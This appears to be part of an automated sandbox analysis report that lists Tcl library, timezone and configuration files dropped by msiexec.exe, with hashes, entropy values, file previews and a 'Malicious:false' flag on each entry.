                                                                                                                                SHA-512:445DC9A50487A4BA0A7F79078441696DCAA31F9988E5B515B5A827AC9275776B22DE303040900C1726EB99CABA8AD09E57AA674F798EA3FDEBC580E4B87D9439
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Detroit)]} {.. LoadTimeZoneFile America/Detroit..}..set TZData(:US/Michigan) $TZData(:America/Detroit)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):182
                                                                                                                                Entropy (8bit):4.892777905787396
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06RGFfXHAIg206RORL/iBOlLo/4IAcGE6RB:SlSWB9vsM3y7+SPHAIgp+ON/iBY8/49Z
                                                                                                                                MD5:E53EDD55E6448C624DD03A8A100EF5AF
                                                                                                                                SHA1:1D266553CAFA23A3375CFAF7AFE6636553CC7B70
                                                                                                                                SHA-256:3763BF520D3C97148C34DCFBDF70DEC2636D4E38241555900C058EFEE3BD1256
                                                                                                                                SHA-512:B7FCF01DBB4231F30FEFA77C339B2CD7D984D6E6182F3BD15D6B64AC9525994E7CBF90C3F1F520FD22B54E19831B3CBAE1C22F04F60244C0C60A1809942422A4
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Denver)]} {.. LoadTimeZoneFile America/Denver..}..set TZData(:US/Mountain) $TZData(:America/Denver)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):196
                                                                                                                                Entropy (8bit):4.932311644026309
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0ydJg4o3vXHAIg20ydJPyHRL/iP+e2IAcGEydJgov:SlSWB9vsM3y7DvPHAIgp5N/ip290Dy
                                                                                                                                MD5:37AF94FAB52D80AF32C766644892E36D
                                                                                                                                SHA1:03CE96A3B3EBFC16C9ED192DD2127FB265A7ED49
                                                                                                                                SHA-256:54E5F126D4E7CC13555841A61FF66C0350621C089F475638A393930B3FB4918C
                                                                                                                                SHA-512:405A7F414FA0864111E5E9F06FCA675BF4EF11FE0F82F5438416273BEF820A030A50E4D43E4E522ED79C08C0C243E9DD3692971DC912C9ADFB1BEABEB935CDDC
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Los_Angeles)]} {.. LoadTimeZoneFile America/Los_Angeles..}..set TZData(:US/Pacific) $TZData(:America/Los_Angeles)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):200
                                                                                                                                Entropy (8bit):4.977247045064076
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0ydJg4o3vXHAIg20ydJPyHRL/iP+yoQIAcGEydJgy:SlSWB9vsM3y7DvPHAIgp5N/i0Q90Dy
                                                                                                                                MD5:870946B6C9C7C48EDDFDC7FEA5A303F5
                                                                                                                                SHA1:F4E86423BD0EDFFD07B69B6D8834E28890A433BF
                                                                                                                                SHA-256:B14C515D5823E7F6E4C67892FA376D54DB748FAB139C4D40DB50F22D113BAE4F
                                                                                                                                SHA-512:36071FA97BD1052FB0425FDA7239F55728B3A6ACDF78A7A8F92D080DA25C0DF432F6C2B0CE9BD296B0C814451C5D7922E1318B004D9089E934B9C81B5E6077D6
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Los_Angeles)]} {.. LoadTimeZoneFile America/Los_Angeles..}..set TZData(:US/Pacific-New) $TZData(:America/Los_Angeles)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):188
                                                                                                                                Entropy (8bit):4.838968615416201
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGurKeTnXHAIgObTurKefVHRL/i6A5nUDHurKeTyn:SlSWB9vsM3yciemHAIgObiecN/idXevn
                                                                                                                                MD5:509CF35F5F7C9567FD19CC5C137DC070
                                                                                                                                SHA1:AA5F27D36BC617A6A4107E3CA0CB0C10A71A1D9E
                                                                                                                                SHA-256:E51FC51C65FFEAB514D7636271157EE8941BDACF602CBC380F5D60B5FA674E87
                                                                                                                                SHA-512:E23633A16F11015F3FE2F4E675B5A60B4FDC61F8CF152FDB9BA7ED4C213B8897117721A78C5470296DAFB0FD4F0DDC019DD0DB8C28C1F1B2BE0D3A289F53D5B3
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Pago_Pago)]} {.. LoadTimeZoneFile Pacific/Pago_Pago..}..set TZData(:US/Samoa) $TZData(:Pacific/Pago_Pago)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):153
                                                                                                                                Entropy (8bit):4.844017562912325
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/iLB5h8RFB:SlSWB9vsM3yzTHAIgm6N/iLfh8RX
                                                                                                                                MD5:3402C8784654C24F7E956731866B833F
                                                                                                                                SHA1:C34F3CCA074A50E6564B8C78683C8763B37A3002
                                                                                                                                SHA-256:DEE28FF84E3FC495ED3547D5E5E9FAFDACC36A67329E747D434248ED45BF1755
                                                                                                                                SHA-512:FBA2840B0FA0F084EE9840BCF56E497F8A7ABF509FA10FA66FB26BA3D80079C4F9A363577A453CD68557080EAF9DD7F1F7B5AF957B64BDA2A897B1E08C85DD19
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:UTC) $TZData(:Etc/UTC)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):159
                                                                                                                                Entropy (8bit):4.879221007428352
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/iL7DJMFfh8RFB:SlSWB9vsM3yzTHAIgm6N/iL7VMr8RX
                                                                                                                                MD5:5F24A249884C241D1E03D758C2641675
                                                                                                                                SHA1:63AAC15A68659006F8A14FEC3F2A66B55A8AC398
                                                                                                                                SHA-256:B7B0B82F471D64704E1D6F84646E6B7B2BD9CAB793FAD00F9C9B0595143C0AB7
                                                                                                                                SHA-512:A7AB5E26A2C23BA296942D7C524C6EE6708A9A38CDD88022EA92E2180BC3CCFE930758FC20A24A0D271AD70733EB924B0E530FBF83CC0FC49EAD411B28503CC0
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Universal) $TZData(:Etc/UTC)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):172
                                                                                                                                Entropy (8bit):4.999171213761279
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVwTwWXHAIgoqzTbNOARL/gIuyQauTgvn:SlSWB9vsM3ymSHAIgoXAN/gXy5n
                                                                                                                                MD5:5444E85070CA2E7A52D38D6D53216B88
                                                                                                                                SHA1:0F9A4FB1156312EBD0B9C81DA2164E89D21878E1
                                                                                                                                SHA-256:F7DA75B585F45AB501B2889E272FF47B1C4A1D668E40AED7463EB0E8054028C2
                                                                                                                                SHA-512:BBC94F98C84641392D3A4B67C152E92EDB3011DA329319ADB2485DBEAFD44DED328D80FBCA89E58687E1F0EB6BED8580BBB0075CA42284B6206A8641D76F2DE5
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Moscow)]} {.. LoadTimeZoneFile Europe/Moscow..}..set TZData(:W-SU) $TZData(:Europe/Moscow)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6945
                                                                                                                                Entropy (8bit):3.7806395604065135
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:v6PgDGfXCiZoFtFPIaFF1w0urfva946ZGsE3f2Sf+aCNmSv+kznl4klEp8OT:rQbkIaFF1w0us4qE3+sSGjT
                                                                                                                                MD5:1EC38B05B53ECF2DD3A90164C4693934
                                                                                                                                SHA1:00900F0ADDB7526C63C67CA1662C038E95A79245
                                                                                                                                SHA-256:7E6E2369C19DD19A41BE27BB8AD8DF5BE8B0096ED045C8B2C2D2F0916D494079
                                                                                                                                SHA-512:47A8DAAB1B891FF09A94AF01B6673213392F70C6C1EE53D95A59D6E238FD06B0E80FA21C7279A9ADA891F5CA5B86E4D6B696EE8CFE14BFEF0ACCC9759AF1419A
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:WET) {.. {-9223372036854775808 0 0 WET}.. {228877200 3600 1 WEST}.. {243997200 0 0 WET}.. {260326800 3600 1 WEST}.. {276051600 0 0 WET}.. {291776400 3600 1 WEST}.. {307501200 0 0 WET}.. {323830800 3600 1 WEST}.. {338950800 0 0 WET}.. {354675600 3600 1 WEST}.. {370400400 0 0 WET}.. {386125200 3600 1 WEST}.. {401850000 0 0 WET}.. {417574800 3600 1 WEST}.. {433299600 0 0 WET}.. {449024400 3600 1 WEST}.. {465354000 0 0 WET}.. {481078800 3600 1 WEST}.. {496803600 0 0 WET}.. {512528400 3600 1 WEST}.. {528253200 0 0 WET}.. {543978000 3600 1 WEST}.. {559702800 0 0 WET}.. {575427600 3600 1 WEST}.. {591152400 0 0 WET}.. {606877200 3600 1 WEST}.. {622602000 0 0 WET}.. {638326800 3600 1 WEST}.. {654656400 0 0 WET}.. {670381200 3600 1 WEST}.. {686106000 0 0 WET}.. {701830800 3600 1 WEST}.. {717555600 0 0 WET}.. {733280400 3600 1 WEST}..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):154
                                                                                                                                Entropy (8bit):4.8800842076244715
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqAxmS3vXHAIgELyHRL/taFBURFB:SlSWB9vsM3yzTHAIgm6N/YFaRX
                                                                                                                                MD5:DDB6F69CA4F0EF6A708481F53F95EAB9
                                                                                                                                SHA1:A63E900A9257E9D73B4BB4BACBA8133C3D1DC41B
                                                                                                                                SHA-256:A06E8CCCF97CC8FB545DFDB4C89B5E5C8EDF0360547BDC1823B4AC47B1556C31
                                                                                                                                SHA-512:C8EA1039BE001F5EF52662B28DBF46D02E4848F08F05923850DEA1994732037B4C8D6030B742D97FA4276AF5FEE3F17C47C7DDA4F44DD23244F9976A076D5CC4
                                                                                                                                Malicious:false
                                                                                                                                Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Etc/UTC)]} {.. LoadTimeZoneFile Etc/UTC..}..set TZData(:Zulu) $TZData(:Etc/UTC)..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):5030
                                                                                                                                Entropy (8bit):4.838527643033185
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:HgTQWiZuhdFQJmuldFQofsGP3R1hF9Dl19arB0E9Dl1YoaEhHe2Gu/q1ZFyJRpqk:8iZUroxvR197ABr971h5GIqrmbqIc+b/
                                                                                                                                MD5:70450A0CF04EF273EFF2B070053FCFA6
                                                                                                                                SHA1:47974D6C0FC986EE1273C4E13DDB9E1288CEF0FF
                                                                                                                                SHA-256:678F891615E2209A8ECBA17857922A9723E78709ADB983032E89CA706000C44D
                                                                                                                                SHA-512:AFD3E47324D1497CC46AC6141191FCEB843977D0B0285C807FF8985DCC56FDE10977F57D503D986CD2C1EDC6C62F01E405A0EB483340B247B129FC8D6D9FE689
                                                                                                                                Malicious:false
                                                                                                                                Preview:# word.tcl --..#..# This file defines various procedures for computing word boundaries in..# strings. This file is primarily needed so Tk text and entry widgets behave..# properly for different platforms...#..# Copyright (c) 1996 Sun Microsystems, Inc...# Copyright (c) 1998 Scritpics Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....# The following variables are used to determine which characters are..# interpreted as white space.....if {$::tcl_platform(platform) eq "windows"} {.. # Windows style - any but a unicode space char.. if {![info exists ::tcl_wordchars]} {...set ::tcl_wordchars {\S}.. }.. if {![info exists ::tcl_nonwordchars]} {...set ::tcl_nonwordchars {\s}.. }..} else {.. # Motif style - any unicode word char (number, letter, or underscore).. if {![info exists ::tcl_wordchars]} {...set ::tcl_wordchars {\w}.. }.. if {![info exists ::tcl_nonwordchar
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:current ar archive
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):185936
                                                                                                                                Entropy (8bit):5.231090386301054
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:bYSz7Eqz+WBYvJFVRIxY0pkBffYL6KvyC9EyN5icJYhYEA7mNv40SKh2sjeZep/:cg7Eq0V2pkBsewEyfSy7muqkep/
                                                                                                                                MD5:33C216E92D9838387CC1B88984BFEF9A
                                                                                                                                SHA1:5BC3BC2615777AD8ED7B922CAA5D2C42FC194D9A
                                                                                                                                SHA-256:7E200245CEC5FEE4D850871A3F4AE665D5EDBFCFF9E2774922EE42792A4A0FE1
                                                                                                                                SHA-512:A0F23AD747D5D86DE09572502B34220BAD3B49E7071622D675C80026C3E17AC5A5E403229CAA170FCB1D1FEFC854A6B3E30FAF672B34B28C0B2690552C202BD8
                                                                                                                                Malicious:false
                                                                                                                                Preview:!<arch>./ -1 0 44152 `.......Yz..[...\....n...n...,...,..........................bR..bR..c...c...dr..dr..d...d...c...c...b...b...G...G....*...*...D...D..H...H............^...^...z...z..........................."..."...h...h...@...@...................................x...x...2...2...>...>..I"..I"...................................z...z...(...(..................N...N....6...6..................ZF..ZF..8...8..........................v...v..'...'...(...(...(r..(r..(...(............p...p...&...&...V...V..............................I...I.........O...O....t...t... ... ...~...~... ... ...........T...T...<...<.......... ... ....6...6........f...f...........................L...L..........................&...&...&...&..{...{....D...D...........T...T...X...X..........q...q...................eF..eF...........T...T...........(...(..f...f......................................................l...l...B...B...z...z...N...N...................T
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11423
                                                                                                                                Entropy (8bit):5.034817754935299
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:rXlm2LnoZ7k2mOEhYoKVtWD2xLsmF+MNlPQ4lJ+B0O0DgryYY/+zf7gZ:rXlm2Lng7kvF2VtWD2xLeMNT+B0O0Uro
                                                                                                                                MD5:628A1F34F7B7149303918E52114D2C3B
                                                                                                                                SHA1:DBE52586BB784940D1EEADC6A2C6985F5A0D4A80
                                                                                                                                SHA-256:C96140D154C3BDC0A13A06C8B8B7628DFCD014DF827704D1DBCB2B3B38349605
                                                                                                                                SHA-512:560F1121F25C8558335DBBBBF38A382A68619F2A28967820B56266F548BF33FC23F3D13B77B4EF2D23B8330F6B6EC0E089EB1FF3864FED3F71CA28CE0A79EFB7
                                                                                                                                Malicious:false
                                                                                                                                Preview:# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Heuristics to assemble a platform identifier from publicly available..# information. The identifier describes the platform of the currently..# running tcl shell. This is a mixture of the runtime environment and..# of build-time properties of the executable itself...#..# Examples:..# <1> A tcl shell executing on a x86_64 processor, but having a..# wordsize of 4 was compiled for the x86 environment, i.e. 32..# bit, and loaded packages have to match that, and not the..# actual cpu...#..# <2> The hp/solaris 32/64 bit builds of the core cannot be..# distinguished by looking at tcl_platform. As packages have to..# match the 32/64 information we have to look in more places. In..# this case we inspect the executable itself (magic numbers,..# i.e. fileutil::magic::filetype)...#..# The basic information used comes out of the 'os' and 'machine'..# entries of the 'tcl_platform' array. A number of general and
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):6218
                                                                                                                                Entropy (8bit):4.843141834641668
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:PV5U+VLnNUPVvH+knNUPVUHD5ngWftN+IgMufIdqi+g0SYiCXVDjqL:Nm6MFXN5uwq51iCFD2
                                                                                                                                MD5:8ABC3029963E433D1D9865AAA7E1057B
                                                                                                                                SHA1:A88091DC98B2FD0AE3A258B59F8BE43F41F04323
                                                                                                                                SHA-256:0A6B4B109CFDFC4B40FBDEFDB2282F9B1AF3CC2F9624DD39958EEBD78781AFB2
                                                                                                                                SHA-512:D5068375615A2200DDC13EEB852B2E21B7E4AA416FB7A0E97C98B8B106D7701792C523739E8BF266D2ABE411D4298A0B5B3884CFB9DF820FD4A2B61B22F9DECF
                                                                                                                                Malicious:false
                                                                                                                                Preview:..# -*- tcl -*-..# ### ### ### ######### ######### #########..## Overview....# Higher-level commands which invoke the functionality of this package..# for an arbitrary tcl shell (tclsh, wish, ...). This is required by a..# repository as while the tcl shell executing packages uses the same..# platform in general as a repository application there can be..# differences in detail (i.e. 32/64 bit builds).....# ### ### ### ######### ######### #########..## Requirements....package require platform..namespace eval ::platform::shell {}....# ### ### ### ######### ######### #########..## Implementation....# -- platform::shell::generic....proc ::platform::shell::generic {shell} {.. # Argument is the path to a tcl shell..... CHECK $shell.. LOCATE base out.... set code {}.. # Forget any pre-existing platform package, it might be in.. # conflict with this one... lappend code {package forget platform}.. # Inject our platform package.. lappend code [list source $base]..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):35136
                                                                                                                                Entropy (8bit):4.945501767273492
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:m3xQvCzasI/rHPG2yfkZ0Kbh91iQ3Lnq5MIVYB8mbgijsPIWtw4qvUm:4xQvCzasIDHPG2yW0kJ32imXmUij6JjG
                                                                                                                                MD5:BD4FF2A1F742D9E6E699EEEE5E678AD1
                                                                                                                                SHA1:811AD83AFF80131BA73ABC546C6BD78453BF3EB9
                                                                                                                                SHA-256:6774519F179872EC5292523F2788B77B2B839E15665037E097A0D4EDDDD1C6FB
                                                                                                                                SHA-512:B77E4A68017BA57C06876B21B8110C636F9BA1DD0BA9D7A0C50096F3F6391508CF3562DD94ACEAF673113DBD336109DA958044AEFAC0AFB0F833A652E4438F43
                                                                                                                                Malicious:false
                                                                                                                                Preview:# msgcat.tcl --..#..#.This file defines various procedures which implement a..#.message catalog facility for Tcl programs. It should be..#.loaded with the command "package require msgcat"...#..# Copyright (c) 2010-2015 Harald Oehlmann...# Copyright (c) 1998-2000 Ajuba Solutions...# Copyright (c) 1998 Mark Harrison...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.5-..# When the version number changes, be sure to update the pkgIndex.tcl file,..# and the installation directory in the Makefiles...package provide msgcat 1.6.1....namespace eval msgcat {.. namespace export mc mcexists mcload mclocale mcmax mcmset mcpreferences mcset\.. mcunknown mcflset mcflmset mcloadedlocales mcforgetpackage\... mcpackageconfig mcpackagelocale.... # Records the list of locales to search.. variable Loclist {}.... # List of currently loaded locales.. variable LoadedLoc
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):107041
                                                                                                                                Entropy (8bit):4.838727837954522
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3072:7zsUYg6sali4N8uBPS5PP9AlGXJL/RiBh:74UDqli4N8uBPS5PP9AYXJL/RiBh
                                                                                                                                MD5:B65B89714DE27DC64557882FD4A9F28A
                                                                                                                                SHA1:8FD99F1AB678A9BBAE0B7BD492C6EAE6801FC4AB
                                                                                                                                SHA-256:F6931F88AE2A4E63D77EEC83E58F5944D66C7EF5F335A51064E8023E0C842971
                                                                                                                                SHA-512:BC39C99C94D870D4AFAAC1E641806E110E3CAE6A459F7B6FDB543E4D4E14FE4462B60BC77F192EEE352D48C71E6F15F3C0989D3860F8272A32186F45E86DC963
                                                                                                                                Malicious:false
                                                                                                                                Preview:# tcltest.tcl --..#..#.This file contains support code for the Tcl test suite. It..# defines the tcltest namespace and finds and defines the output..# directory, constraints available, output and error channels,..#.etc. used by Tcl tests. See the tcltest man page for more..#.details...#..# This design was based on the Tcl testing approach designed and..# initially implemented by Mary Ann May-Pumphrey of Sun..#.Microsystems...#..# Copyright (c) 1994-1997 Sun Microsystems, Inc...# Copyright (c) 1998-1999 Scriptics Corporation...# Copyright (c) 2000 Ajuba Solutions..# Contributions from Don Porter, NIST, 2002. (not subject to US copyright)..# All rights reserved.....package require Tcl 8.5-..;# -verbose line uses [info frame]..namespace eval tcltest {.... # When the version number changes, be sure to update the pkgIndex.tcl file,.. # and the install directory in the Makefiles. When the minor version.. # changes (new feature) be sure to update the man p
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):115215
                                                                                                                                Entropy (8bit):4.8838770373771405
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:SYY1IO/Kufhf17a6DLJuuBuzEj6aIsGc3e6YhTjn82872y4e2BxIQAIk:SbyOCufBQaLJOEjlxTYhTjn828CBevQM
                                                                                                                                MD5:02B5B1026BD2CB9C7CEFFEB7E098AD18
                                                                                                                                SHA1:729CDB4F852531A0A4BFBBBC64F11EA4E6B90A66
                                                                                                                                SHA-256:226347B0FAE4A3ED9237CE64C998C2A88B4FDD3D7F85A081B7CAB3E863FEB13D
                                                                                                                                SHA-512:805EBBF7660357AC7234CC9EAC0566BE506B7A20E59A2EE13869EF4FC2D407C6F12B705EDE5033A24D37860887C4337B660D8CEF89030AAD4AF659DA9664EB10
                                                                                                                                Malicious:false
                                                                                                                                Preview:# http.tcl --..#..#.Client-side HTTP for GET, POST, and HEAD commands. These routines can..#.be used in untrusted code that uses the Safesock security policy...#.These procedures use a callback interface to avoid using vwait, which..#.is not defined in the safe base...#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES.....package require Tcl 8.6-..# Keep this in sync with pkgIndex.tcl and with the install directories in..# Makefiles..package provide http 2.9.5....namespace eval http {.. # Allow resourcing to not clobber existing data.... variable http.. if {![info exists http]} {...array set http {... -accept */*... -pipeline 1... -postfresh 0... -proxyhost {}... -proxyport {}... -proxyfilter http::ProxyRequired... -repost 0... -urlencoding utf-8... -zip 1...}...# We need a useragent string of this style or various servers will...# refuse to send us compressed content
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with very long lines (694), with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):7746
                                                                                                                                Entropy (8bit):5.391607365873486
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:96:z1S1vJYl/DMGrbxvno9IrPHumrEoXPxiHQY0R1p8hJb/gmfCA6rCZ/7uFsAVmoRy:pFDfvpOC8PbZCA6rueo9ew
                                                                                                                                MD5:1CF1328DF28BA83FFD3F2C95E7BD8E50
                                                                                                                                SHA1:8064494269DA368EAA4CC93868BBD909CAB8C2A2
                                                                                                                                SHA-256:51B359F8C297EFC3A2F0B473AE8629DEFCA9E6DD6DE5C662DD694C7DF7683ED4
                                                                                                                                SHA-512:76DC5A93755DAC4724D60B9AF857FA34CD4EBE551DBF11864859112A7D3900023A92413F9F1448D10CDFA01BA5DE75B29336C7444BF23F0929D40EE76A32BB70
                                                                                                                                Malicious:false
                                                                                                                                Preview:# tclConfig.sh --..#..# This shell script (for sh) is generated automatically by Tcl's..# configure script. It will create shell variables for most of..# the configuration options discovered by the configure script...# This script is intended to be included by the configure scripts..# for Tcl extensions so that they don't have to figure this all..# out for themselves...#..# The information in this file is specific to a single platform.....TCL_DLL_FILE="tcl86t.dll"....# Tcl's version number...TCL_VERSION='8.6'..TCL_MAJOR_VERSION='8'..TCL_MINOR_VERSION='6'..TCL_PATCH_LEVEL='8.6.12'....# C compiler to use for compilation...TCL_CC='cl'....# -D flags for use with the C compiler...TCL_DEFS='-nologo -c /D_ATL_XP_TARGETING /DHAVE_CPUID=1 -W3 -wd4311 -wd4312 -wd4311 -wd4312 -FpD:\_w\1\b\externals\tcl-core-8.6.12.1\win\Release_AMD64_VC13\tcl_ThreadedDynamic\ -fp:strict -O2 -GS -GL -MD -I"D:\_w\1\b\externals\tcl-core-8.6.12.1\win\..\win" -I"D:\_w\1\b\externals\tcl-core-8.6.12.1\win\..\generic"
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):792
                                                                                                                                Entropy (8bit):5.017720082429781
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:12:nMu75sIjeCNGR5hMI9lwXk2YvLGCJ25ZyDJcLSiSkqlGSGiq1lfdHmmZlJv:Mu7SSkVvv0ASLSiSkql8d5mSlh
                                                                                                                                MD5:AA0F72A35B6DAD2FF6BB6A86F177CBE2
                                                                                                                                SHA1:2ADFF183BAA6A102314AEFAAE9B9B1B64FDD7750
                                                                                                                                SHA-256:F4D7D687DAC5033B04BCF6C9CF3014B8139C79E730F6C431C437108A9BB3CEEB
                                                                                                                                SHA-512:5DD6840036E31BDEFACD8E2B4AEC980398170F94AE45246D2607BB3EA14AE8B82357BFB286252F2232E81B69BE59432A682CFDBE777B5544B385842745C88774
                                                                                                                                Malicious:false
                                                                                                                                Preview:# tclooConfig.sh --..#..# This shell script (for sh) is generated automatically by TclOO's configure..# script, or would be except it has no values that we substitute. It will..# create shell variables for most of the configuration options discovered by..# the configure script. This script is intended to be included by TEA-based..# configure scripts for TclOO extensions so that they don't have to figure..# this all out for themselves...#..# The information in this file is specific to a single platform.....# These are mostly empty because no special steps are ever needed from Tcl 8.6..# onwards; all libraries and include files are just part of Tcl...TCLOO_LIB_SPEC=""..TCLOO_STUB_LIB_SPEC=""..TCLOO_INCLUDE_SPEC=""..TCLOO_PRIVATE_INCLUDE_SPEC=""..TCLOO_CFLAGS=""..TCLOO_VERSION=1.1.0..
                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                File Type:current ar archive
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):9464
                                                                                                                                Entropy (8bit):5.154802491242801
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:MHEO9Q096Vb1Bsu3gFFaXA7f33gagtzX7AnSRfWe:MHEO9Q096h1waXA7CtzkSRfWe
                                                                                                                                MD5:2E0DB1AB2EF7E1B099316986CA83C1F9
                                                                                                                                SHA1:3712B0EBD504CEC492A98B664F0EA4779C781E79
                                                                                                                                SHA-256:612177D73CF56A5156629EEE486776EEF6A965183F77137254CDC0A5A83969F9
                                                                                                                                SHA-512:ACD503ABA8074F7F8CCD77E39509D4EB49CEF9DD3AF176129E058940AC3F2A6E8DE1586E62391B1EFCA0AF5A49053817A8C40A4E6DF46EE259E85B42DC51B712
                                                                                                                                Malicious:false
                                                                                                                                Preview:!<arch>./ 1646042570 0 690 `........0...0...0...0...0...0...0...0...0.......................d...d...d...d...d...d...d??_C@_03LPPJIELD@?$CJ?3?5@.??_C@_05HKGHMIKM@TclOO@.??_C@_0BC@MLHLOHD@?0?5actual?5version?5@.??_C@_0BF@KIHAOAMA@?5?$CIrequested?5version?5@.??_C@_0BL@IIMOLINK@missing?5stub?5table?5pointer@.??_C@_0P@CJNDDKOD@Error?5loading?5@.TclOOInitializeStubs.tclOOIntStubsPtr.tclOOStubsPtr.??_C@_0BG@LPJBDADG@epoch?5number?5mismatch@.??_C@_0BK@JIJKOOBC@requires?5a?5later?5revision@.??_C@_0N@LGGAPAIO@tcl?3?3tommath@.TclTomMathInitializeStubs.tclTomMathStubsPtr.??_C@_03BJANOJME@Tcl@.??_C@_0DB@MFODBADJ@interpreter?5uses?5an?5incompatibl@.Tcl_InitStubs.tclIntPlatStubsPtr.tclIntStubsPtr.tclPlatStubsPtr.tclStubsPtr./ 1646042570 0 664 `.....0.......d.................................................??_C@_03BJANOJME@Tcl@.??_C@_03LPPJIELD@?$CJ?3?5@.??_C@_05HKGHMIKM@TclOO@.??_C@_0BC@MLHLOHD@?0?5actual?5version?5@.??_C@_
